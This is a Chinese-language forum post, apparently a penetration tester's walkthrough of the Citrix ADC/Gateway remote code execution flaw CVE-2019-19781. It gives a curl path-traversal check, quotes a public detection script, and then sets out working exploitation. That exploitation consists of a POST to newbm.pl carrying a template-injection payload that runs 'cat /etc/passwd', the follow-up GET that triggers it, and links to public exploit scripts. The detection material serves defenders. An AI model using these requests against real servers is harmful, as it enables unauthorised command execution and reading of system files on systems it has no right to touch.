###Citrix Gateway/ADC 远程代码执行漏洞-nuoyan
1、影响范围
Citrix NetScaler ADC and NetScaler Gateway version 10.5
Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1
Citrix ADC and Citrix Gateway version 13.0
2、检测过程
curl发送命令,查看返回,返回200可能存在漏洞
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
#response
[global]
encrypt passwords = yes
name resolve order = lmhosts wins host bcast
在实际测试中,肯定要面对https证书等问题,如果目标不存在漏洞上述测试语句是没有回显的,可以借助I参数返回响应头(i返回headers+body ),如下403说明已通过补丁修复。
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is -k -I
#response
HTTP/1.1 403 Forbidden
3、自动化脚本
下载地址:https://github.com/trustedsec/cve-2019-19781
# if the system is still vulnerable
if ("[global]") in str(req.content) and ("encrypt passwords") in str(req.content) and (
"name resolve order") in str(req.content): # each smb.conf will contain a [global] variable
print("[\033[91m!\033[0m] This Citrix ADC Server: %s is still vulnerable to CVE-2019-19781." % (target))
vulnServers.append(target)
return 1
# if the system responds with a Citrix message (fixed) or a 403 (fixed)
elif ("Citrix") in str(req.content) or "403" in str(req.status_code): # only seen if system is not vulnerable
print(
"[\033[92m*\033[0m] Server: %s responded with a 403. If this is a Citrix Server, it is not vulnerable. Awesome!" % (
target))
# if we run into something other than Citrix
else:
if verbose == True: print("[-] Server %s does not appear to be a Citrix server." % (target))
pass
脚本和手动检测原理相同,403直接判定安全,其他情况判定为非Citrix server。
4、利用过程
发送post请求
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
NSC_USER: ../../../netscaler/portal/templates/jk666
NSC_NONCE:nsroot
Content-Length: 96
url=127.0.0.1&title=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]&desc=desc&UI_inuse=a
有风险不一定可利用,如newbm.bl被删除或被重命名,实战中确实也遇到了404的情况,此外,上传成功的body体如下:
HTTP/1.1 200 OK
<HTML>
<BODY>
<SCRIPT language=javascript type=text/javascript>
//parent.window.ns_reload();
window.close();
</SCRIPT>
</BODY>
</HTML>
可参考小胖虎大佬的文章尝试其它利用点,只是漏洞利用需要将poc写入文件名, 可能会受到特殊字符影响,总体不如newbm.pl。https://www.freebuf.com/news/232752.html
GET /vpn/../vpns/portal/jk666.xml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
NSC_USER:nsroot
NSC_NONCE:nsroot
也可以使用自动化脚本进行利用
https://github.com/jas502n/CVE-2019-19781 https://github.com/projectzeroindia/CVE-2019-19781
请登录后查看回复内容